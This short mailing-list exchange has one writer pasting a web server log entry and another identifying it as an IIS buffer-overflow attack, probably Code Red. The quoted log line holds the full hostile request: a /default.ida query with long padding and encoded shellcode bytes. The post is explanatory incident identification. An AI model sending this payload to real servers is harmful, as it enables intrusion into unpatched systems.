Miguel Albuquerque <mfoacs@e-workshop.ch> wrote:
Hi,
What about this: schebish.c.crosslink.net - - [11/Oct/2002:17:02:57 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329 ??
A buffer overflow aimed at a legacy API in IIS if I recall correctly (probably Code Red). Really, you should try a search with Google: http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%2Fdefault.ida%3F... &btnG=Google+Search In other words, I pasted "/default.ida?NNNNNN" into the search window. It *is* that easy... -- Fred Morris m3047@inwa.net